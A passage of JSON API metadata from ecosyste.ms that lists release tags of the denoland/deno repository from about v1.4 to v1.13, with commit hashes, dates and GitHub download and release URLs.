ps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4